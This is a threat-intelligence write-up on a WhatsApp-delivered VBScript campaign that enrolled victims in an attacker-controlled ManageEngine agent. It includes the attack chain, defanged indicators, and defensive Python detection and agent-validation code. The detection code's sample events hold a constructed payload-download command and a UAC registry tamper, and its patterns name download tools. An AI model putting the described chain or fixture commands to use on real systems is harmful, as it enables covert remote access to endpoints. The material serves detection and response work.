
WhatsApp VBScript ManageEngine RMM campaign

Summary

Kaspersky reported a June 2026 campaign that used compromised WhatsApp accounts to send malicious .vbs / .vbe attachments directly to contacts. The attachments masqueraded as invoices, debt notices, account statements, payment records, bank statements, and localized business documents; execution launched Windows Script Host and a multi-stage VBScript chain that installed a preconfigured ManageEngine Endpoint Central agent for remote access.

Kaspersky observed victims in Malaysia, Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, and Vietnam, with about 80% of observed victims in Malaysia. The campaign appeared broad and opportunistic rather than focused on a specific organization or sector. Kaspersky made a low-confidence assessment that the operators are Chinese-speaking, based on simplified-Chinese script comments and infrastructure overlap with previously observed ValleyRAT / Gh0st RAT activity, but did not attribute the campaign to a known group.

Why this matters

  • The lure comes from a known WhatsApp contact, so user trust is borrowed from a compromised personal account rather than from a spoofed sender domain.
  • The payload abuses a legitimate endpoint-management platform. Successful response has to distinguish authorized ManageEngine Endpoint Central agents from attacker-enrolled agents.
  • The chain still depends on user execution, but it layers financial-document naming, localized filenames, Windows Update-themed comments, hidden staging directories, renamed Windows download utilities, and UAC-prompt loops to increase success.
  • Consumer messaging apps on business endpoints create a blind spot: WhatsApp Desktop can spawn WScript.exe directly from its attachment storage path.

Reported chain

  1. A compromised WhatsApp account sends an attachment such as Financial Reports.vbs, Debt confirmation.vbs, Account Statement.vbs, Penyata bank.vbs, or another localized finance-themed filename to contacts.
  2. On WhatsApp Desktop, opening the attachment spawns WScript.exe from WhatsApp.Root.exe and executes the script from the WhatsApp Desktop attachment cache. On WhatsApp Web, execution starts from the browser download path or Windows Explorer.
  3. Stage 1 creates a working directory under C:\Users\Public\Documents\, commonly using randomized names such as Temp_<random> or MSUpdate_<random>, and may mark files or directories hidden/system.
  4. Stage 1 downloads two additional VBScript payloads from attacker-controlled infrastructure. Variants use obfuscation, encoded VBScript, randomized variables, junk content, string reconstruction, and renamed curl.exe / bitsadmin.exe copies with DLL-like names.
  5. One Stage 2 script repeatedly attempts to set HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0 (the value that elevates administrators without a consent prompt) through an elevated runas flow, so that administrative consent prompts are reduced once the victim grants elevation.
  6. The other Stage 2 script creates another hidden working directory, downloads a ZIP archive through mechanisms such as curl, bitsadmin, certutil, PowerShell, or direct HTTP requests, extracts it with Shell.Application, may strip Zone.Identifier, and launches setup1.vbs.
  7. The ZIP contains a preconfigured ManageEngine Endpoint Central deployment bundle, including DCAgentServerInfo.json, certificates, UEMSAgent.msi, UEMSAgent.mst, and a malicious setup1.vbs launcher.
  8. setup1.vbs verifies the bundle, relaunches with administrative privileges, and silently installs the Endpoint Central agent through msiexec.exe using the attacker-supplied configuration.

Defender heuristics

  • Hunt for WScript.exe or cscript.exe child processes of WhatsApp.Root.exe, browsers, or explorer.exe opening .vbs / .vbe files from WhatsApp transfer paths, Downloads, or temporary directories.
  • Review C:\Users\Public\Documents\ for hidden/system directories named like Temp_*, MSUpdate_*, Sys*, Data*, random numeric values, and recently staged scripts or ZIP contents.
  • Alert on script-driven use of curl, bitsadmin, certutil, PowerShell download cradles, or Shell.Application ZIP extraction followed by wscript.exe or msiexec.exe from user-writable paths.
  • Monitor attempted writes to ConsentPromptBehaviorAdmin, especially when generated by wscript.exe, cscript.exe, or unusual parent processes.
  • Inventory ManageEngine Endpoint Central agents and validate each installed agent against your organization's legitimate management servers, certificate chain, deployment package, and enrollment time.
  • Treat unexpected Endpoint Central enrollment as a remote-access incident: isolate the host, preserve scripts/ZIPs/configuration files, review remote-control and command logs, and rotate credentials exposed on the endpoint.
  • Restrict script execution from messaging-app download/cache directories where feasible with AppLocker, WDAC, EDR policy, or attack-surface-reduction controls.
  • Educate users that file extensions such as .vbs, .vbe, .js, .ps1, .bat, .cmd, and .exe from messaging apps should be independently verified even when sent by a known contact.
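The process-tree, download-cradle and registry heuristics above, turned into working detection logic as an added example; this is not code from the Kaspersky report. The events are constructed, Sysmon-shaped dictionaries: the field names (host, event_id, image, parent_image, command_line, original_file_name, target_object), the WhatsApp attachment path, the staging directory name and the download URL in the sample are assumptions, and the path patterns should be tuned to the environment. The correlation step adds the "download followed by script host or msiexec from a user-writable path" sequence rule on top of the single-event checks.

```python
"""Added example: the process-tree, download-cradle and registry heuristics
above as runnable detection logic over constructed, Sysmon-shaped events.
Not code from the Kaspersky report; field names and sample paths are assumed."""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Parents named in the heuristics: WhatsApp Desktop, browsers, Explorer.
LAUNCH_PARENTS = {"whatsapp.root.exe", "explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "certutil.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_EXT = re.compile(r"\.vb[se]\b", re.IGNORECASE)
# User-writable locations from the chain: messaging cache, Downloads, Temp,
# and the C:\Users\Public\Documents staging root. Tune for your environment.
USER_WRITABLE = re.compile(
    r"\\(whatsapp|downloads|appdata\\local\\temp|users\\public\\documents)\\", re.IGNORECASE)
CONSENT_VALUE = "consentpromptbehavioradmin"


def _name(path):
    """Lower-case last component of a Windows path or registry key ('' if missing)."""
    return (path or "").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Names of the single-event heuristics that one event triggers."""
    hits = []
    image, parent = _name(ev.get("image")), _name(ev.get("parent_image"))
    cmd = ev.get("command_line", "")
    if ev["event_id"] == 1:  # process creation
        # 1. Script host spawned by a messaging app, browser or Explorer,
        #    running a .vbs/.vbe from a user-writable download/cache path.
        if (image in SCRIPT_HOSTS and parent in LAUNCH_PARENTS
                and SCRIPT_EXT.search(cmd) and USER_WRITABLE.search(cmd)):
            hits.append("script_host_from_messaging_path")
        # 2. Download tool started by a script host. The PE's OriginalFileName
        #    survives the renaming to a DLL-like name described in the chain.
        orig = (ev.get("original_file_name") or "").lower()
        if parent in SCRIPT_HOSTS and (image in DOWNLOADERS or orig in DOWNLOADERS):
            hits.append("script_driven_download")
            if orig and image != orig:
                hits.append("renamed_download_tool")
        # 3. Script host or msiexec operating on a user-writable path.
        if image in SCRIPT_HOSTS | {"msiexec.exe"} and USER_WRITABLE.search(cmd):
            hits.append("script_or_msi_from_user_writable_path")
    elif ev["event_id"] == 13:  # registry value set
        # 4. ConsentPromptBehaviorAdmin written by a script host.
        if _name(ev.get("target_object")) == CONSENT_VALUE and image in SCRIPT_HOSTS:
            hits.append("consent_prompt_tamper")
    return hits


def correlate(events):
    """Run classify() over an ordered stream and add the sequence rule: a
    script-driven download followed on the same host by a script host or
    msiexec running from a user-writable path. Returns {host: sorted alerts}."""
    alerts = defaultdict(set)
    downloaded = set()
    for ev in events:
        host, hits = ev["host"], classify(ev)
        alerts[host].update(hits)
        if "script_driven_download" in hits:
            downloaded.add(host)
        if host in downloaded and "script_or_msi_from_user_writable_path" in hits:
            alerts[host].add("download_then_execute_chain")
    return {h: sorted(a) for h, a in alerts.items() if a}


# Constructed sample events (not from the report). ws01 walks the reported
# chain; ws02 shows benign look-alikes that must not alert.
SAMPLE_EVENTS = [
    {"host": "ws01", "event_id": 1, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Users\a\AppData\Local\WhatsApp\app-2.2\WhatsApp.Root.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\a\AppData\Local\WhatsApp\transfers\Financial Reports.vbs"'},
    {"host": "ws01", "event_id": 1, "image": r"C:\Users\Public\Documents\MSUpdate_7731\wininet32.dll",
     "original_file_name": "curl.exe", "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wininet32.dll -s -o C:\Users\Public\Documents\MSUpdate_7731\u.zip https://placeholder.invalid/u.zip"},
    {"host": "ws01", "event_id": 13, "image": r"C:\Windows\System32\wscript.exe",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin"},
    {"host": "ws01", "event_id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "original_file_name": "msiexec.exe", "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'msiexec.exe /i "C:\Users\Public\Documents\MSUpdate_7731\UEMSAgent.msi" /qn'},
    {"host": "ws02", "event_id": 1, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"wscript.exe \\dc01\netlogon\logon.vbs"},
    {"host": "ws02", "event_id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "original_file_name": "msiexec.exe", "parent_image": r"C:\Windows\CCM\CcmExec.exe",
     "command_line": r'msiexec.exe /i "C:\Windows\ccmcache\1a\app.msi" /qn'},
]

if __name__ == "__main__":
    for host, names in correlate(SAMPLE_EVENTS).items():
        print(host, names)
```

The benign ws02 events (a logon script run from a network share, an MSI installed by the Configuration Manager client) show why the path and parent constraints matter: without them, rules keyed only on wscript.exe or msiexec.exe are too noisy to act on.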

Public indicators

Kaspersky published full hashes and infrastructure in its report. High-level pivots include:

  • Finance-themed and localized VBScript filenames, including Financial Reports.vbs, Debt confirmation.vbs, Statement of Debt(30K).vbs, Outstanding Payment List.vbs, Account Statement.vbs, Penyata bank.vbs, and Sila semak bil anda.vbs.
  • Download / staging domains and buckets such as temu.baskwms[.]top, invoice.msopsa[.]top, qse.shoppes[.]help, shaaslong[.]one, baoxis[.]cc, Aliyun OSS buckets, Amazon S3 buckets, and Backblaze B2 buckets listed in the Kaspersky IOC section.
  • Attacker-controlled Endpoint Central / UEMS management IPs reported by Kaspersky: 202.61.160[.]208, 202.61.160[.]202, 202.61.160[.]201, 202.61.160[.]160, 202.61.160[.]137, and 38.55.151[.]63.
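An added example, not from the report, of the agent-validation step from the defender heuristics above: it normalizes each agent's configured management server (hostname, host:port or URL, defanged or not), compares it to the organization's authorized servers and to the attacker-controlled IPs listed above, and returns the hosts that need incident response. The inventory records, their field names, the authorized-server list and the 203.0.113.77 address are constructed; real values come from the Endpoint Central console export or from the agent's DCAgentServerInfo.json, whose layout is not assumed here.

```python
"""Added example: validating Endpoint Central agents against authorized
management servers and the attacker-controlled IPs published above.
Not code from the report; records, field names and the allowlist are assumed."""
import ipaddress
from urllib.parse import urlsplit

# Attacker-controlled Endpoint Central / UEMS management IPs from the
# indicators above, kept in the same defanged form.
REPORTED_SERVERS = [
    "202.61.160[.]208", "202.61.160[.]202", "202.61.160[.]201",
    "202.61.160[.]160", "202.61.160[.]137", "38.55.151[.]63",
]
# Placeholder for your organization's legitimate management servers.
AUTHORIZED_SERVERS = ["uems.corp.example", "10.20.30.40"]

SEVERITY = {"known_malicious": 0, "unknown_server": 1, "authorized": 2}


def refang(value):
    """Convert the '[.]' notation used in IOC lists back to a comparable value."""
    return value.strip().replace("[.]", ".")


def normalize(server):
    """Reduce a server reference (host, host:port or URL) to a lower-case
    hostname or canonical IP string so inventory and IOC formats compare."""
    s = refang(server)
    if "://" not in s:
        s = "//" + s  # let urlsplit parse host:port without a scheme
    host = (urlsplit(s).hostname or "").lower()
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return host


BAD = {normalize(s) for s in REPORTED_SERVERS}
GOOD = {normalize(s) for s in AUTHORIZED_SERVERS}


def classify_agent(record):
    """Verdict for one agent record from its configured management server."""
    server = normalize(record["server"])
    if server in GOOD:
        return "authorized"
    if server in BAD:
        return "known_malicious"
    return "unknown_server"


def triage(inventory):
    """(host, verdict, server) for every agent not reporting to an authorized
    server, most severe first; each such host is a remote-access incident."""
    rows = [(r["host"], classify_agent(r), normalize(r["server"])) for r in inventory]
    return sorted((row for row in rows if row[1] != "authorized"),
                  key=lambda row: (SEVERITY[row[1]], row[0]))


# Constructed agent inventory (hostnames, the 203.0.113.77 address and the
# port are made up). The 'server' value would come from your console export
# or from DCAgentServerInfo.json inside the deployed bundle.
SAMPLE_INVENTORY = [
    {"host": "hr-desktop-02", "server": "uems.corp.example:8383"},
    {"host": "fin-laptop-07", "server": "https://202.61.160[.]208:8383/"},
    {"host": "it-admin-01", "server": "10.20.30.40"},
    {"host": "sales-laptop-11", "server": "http://203.0.113.77:8383"},
]

if __name__ == "__main__":
    for host, verdict, server in triage(SAMPLE_INVENTORY):
        print(f"{verdict:16} {host:16} -> {server}")
```

An "unknown_server" verdict is not proof of compromise, but the heuristics above treat any enrollment outside the organization's own servers as an incident until the certificate chain, deployment package and enrollment time have been checked against deployment records.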

Attribution notes

  • Kaspersky did not name a known actor for the activity.
  • Simplified-Chinese comments in multiple VBScript samples led Kaspersky to a low-confidence Chinese-speaking-operator assessment.
  • Infrastructure overlap with ValleyRAT and Gh0st RAT activity is a useful pivot, but Kaspersky explicitly treated it as insufficient for direct attribution.

Sources

  • Kaspersky Securelist: https://securelist.com/whatsapp-vbs-rmm-campaign/120290/